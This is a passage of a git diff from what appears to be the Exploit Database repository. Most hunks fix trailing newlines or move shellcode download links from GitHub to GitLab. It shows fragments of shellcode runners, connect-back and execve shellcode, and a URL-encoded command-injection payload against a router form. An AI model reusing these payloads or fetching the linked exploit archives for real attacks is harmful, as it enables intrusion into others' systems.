c%2021%20127.0.0.1%60%20%23%5c%22%20&netmask=255.255.255.0&router=192.168.1.1&inte -17 rface_vlanid_sel=eth1 +17 rface_vlanid_sel=eth1 \ No newline at end of file diff --git a/exploits/xml/webapps/43009.txt b/exploits/xml/webapps/43009.txt index b1f1228c4..70cfee6b8 100644 --- a/exploits/xml/webapps/43009.txt +++ b/exploits/xml/webapps/43009.txt @@ -183,4 +183,4 @@ All these vulnerabilities were tested on the latest version of Apache Solr with These vulnerabilities were discovered by: Michael Stepankin (JPMorgan Chase) -Olga Barinova (Gotham Digital Science) +Olga Barinova (Gotham Digital Science) \ No newline at end of file diff --git a/shellcodes/arm/42646.c b/shellcodes/arm/42646.c index ab7d12d12..f9d9431f2 100644 --- a/shellcodes/arm/42646.c +++ b/shellcodes/arm/42646.c @@ -86,4 +86,4 @@ int main(void) { return 0; -} +} \ No newline at end of file diff --git a/shellcodes/arm/42647.c b/shellcodes/arm/42647.c index a9dee3d67..f307033ff 100644 --- a/shellcodes/arm/42647.c +++ b/shellcodes/arm/42647.c @@ -68,4 +68,4 @@ char *code= "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x0 int main(void) { (*(void(*)()) code)(); return 0; -} +} \ No newline at end of file diff --git a/shellcodes/generator/46696.py b/shellcodes/generator/46696.py index df8f7ff9c..9372106f5 100755 --- a/shellcodes/generator/46696.py +++ b/shellcodes/generator/46696.py @@ -96,4 +96,4 @@ main() printf("Shellcode Length: %d\n", strlen(code)); int (*CodeFun)() = (int(*)())code; CodeFun(); -} +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/39149.c b/shellcodes/linux_x86-64/39149.c index d1c47238b..03aa15477 100644 --- a/shellcodes/linux_x86-64/39149.c +++ b/shellcodes/linux_x86-64/39149.c @@ -154,5 +154,4 @@ main() ret(); -} - +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/39152.c b/shellcodes/linux_x86-64/39152.c index c5c617c55..ba64b0315 100644 --- a/shellcodes/linux_x86-64/39152.c +++ b/shellcodes/linux_x86-64/39152.c @@ -199,5 +199,4 @@ main() ret(); -} - +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/39312.c b/shellcodes/linux_x86-64/39312.c index 6defa82a0..5ef4cac10 100644 --- a/shellcodes/linux_x86-64/39312.c +++ b/shellcodes/linux_x86-64/39312.c @@ -60,5 +60,4 @@ main() ret(); -} - +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/39390.c b/shellcodes/linux_x86-64/39390.c index 4d7a9bb2d..0b5e64483 100644 --- a/shellcodes/linux_x86-64/39390.c +++ b/shellcodes/linux_x86-64/39390.c @@ -47,5 +47,4 @@ main() ret(); -} - +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/41468.nasm b/shellcodes/linux_x86-64/41468.nasm index c4ab4a2d6..24ee4a66d 100644 --- a/shellcodes/linux_x86-64/41468.nasm +++ b/shellcodes/linux_x86-64/41468.nasm @@ -69,4 +69,4 @@ dup2loop: ; Call the Execve syscall mov al, 59 - syscall + syscall \ No newline at end of file diff --git a/shellcodes/linux_x86-64/41503.nasm b/shellcodes/linux_x86-64/41503.nasm index a8935d002..b3d8841c1 100644 --- a/shellcodes/linux_x86-64/41503.nasm +++ b/shellcodes/linux_x86-64/41503.nasm @@ -49,4 +49,4 @@ _start: push rdi push rsp pop rsi - syscall + syscall \ No newline at end of file diff --git a/shellcodes/linux_x86-64/42791.c b/shellcodes/linux_x86-64/42791.c index 5de39145f..befa5e004 100644 --- a/shellcodes/linux_x86-64/42791.c +++ b/shellcodes/linux_x86-64/42791.c @@ -69,4 +69,4 @@ int (*ret)() = (int(*)())code; ret(); -} +} \ No newline at end of file diff --git a/shellcodes/linux_x86/13366.txt b/shellcodes/linux_x86/13366.txt index 29d561b32..fd7cf7433 100644 --- a/shellcodes/linux_x86/13366.txt +++ b/shellcodes/linux_x86/13366.txt @@ -1,5 +1,5 @@ # linux/x86 xor-encoded Connect Back Shellcode 371 bytes -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13366.tar.gz (black-RXenc-con-back.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13366.tar.gz (black-RXenc-con-back.tar.gz) # milw0rm.com [2006-04-18] \ No newline at end of file diff --git a/shellcodes/linux_x86/42594.c b/shellcodes/linux_x86/42594.c index cc37d1107..dcd61efd7 100644 --- a/shellcodes/linux_x86/42594.c +++ b/shellcodes/linux_x86/42594.c @@ -56,4 +56,4 @@ int (*ret)() = (int(*)())code; ret(); -} +} \ No newline at end of file diff --git a/shellcodes/linux_x86/42977.c b/shellcodes/linux_x86/42977.c index fa7b1a508..bfbcc7f45 100644 --- a/shellcodes/linux_x86/42977.c +++ b/shellcodes/linux_x86/42977.c @@ -49,5 +49,4 @@ int main() printf("Length: %d bytes\n", strlen(code)); (*(void(*)()) code)(); return 0; -} - +} \ No newline at end of file diff --git a/shellcodes/osx/17564.asm b/shellcodes/osx/17564.asm index 788bb2fd5..786c2c342 100644 --- a/shellcodes/osx/17564.asm +++ b/shellcodes/osx/17564.asm @@ -200,4 +200,4 @@ _main: ret ; see http://t.co/nIrRbn5 for a detailed explanation -; full package mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17564.tgz (osx.rop.24072011.tgz) \ No newline at end of file +; full package mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17564.tgz (osx.rop.24072011.tgz) \ No newline at end of file diff --git a/shellcodes/windows_x86-64/42992.c b/shellcodes/windows_x86-64/42992.c index 1ba75d636..f1c81fb96 100644 --- a/shellcodes/windows_x86-64/42992.c +++ b/shellcodes/windows_x86-64/42992.c @@ -289,4 +289,4 @@ int main() CloseHandle(proc); return 0; -} +} \ No newline at end of file diff --git a/shellcodes/windows_x86/13507.txt b/shellcodes/windows_x86/13507.txt index ffaaa887a..3e8ea4f8e 100644 --- a/shellcodes/windows_x86/13507.txt +++ b/shellcodes/windows_x86/13507.txt @@ -13,8 +13,8 @@ More details can be found here: http://skypher.com/wiki/index.php?title=Shellcode/w32_SEH_omelet_shellcode http://code.google.com/p/w32-seh-omelet-shellcode/ -backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13507-1.zip (2009-w32-SEH-omlet-shellcode-v0.2.zip) -backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13507-2.zip (2009-w32-SEH-omlet-shellcode-older-versions.zip) +backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13507-1.zip (2009-w32-SEH-omlet-shellcode-v0.2.zip) +backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13507-2.zip (2009-w32-SEH-omlet-shellcode-older-versions.zip) I have not had a chance to test this newer version in a live exploit, so do let me know if you have a chance to use it. diff --git a/shellcodes/windows_x86/15879.txt b/shellcodes/windows_x86/15879.txt index f13a40e21..a4f634a43 100644 --- a/shellcodes/windows_x86/15879.txt +++ b/shellcodes/windows_x86/15879.txt @@ -10,4 +10,4 @@ DEP/ASLR compatible: data is not executed, code is not modified. Windows 7 compatible: kernel32 is found based on the length of its name Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15879.zip (w32-speaking-shellcode.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15879.zip (w32-speaking-shellcode.zip) \ No newline at end of file diff --git a/shellcodes/windows_x86/39754.txt b/shellcodes/windows_x86/39754.txt index e176dbc63..05a384bdf 100644 --- a/shellcodes/windows_x86/39754.txt +++ b/shellcodes/windows_x86/39754.txt @@ -6,5 +6,4 @@ # Tested on: Windows # CVE : (none) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39754.zip - +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39754.zip \ No newline at end of file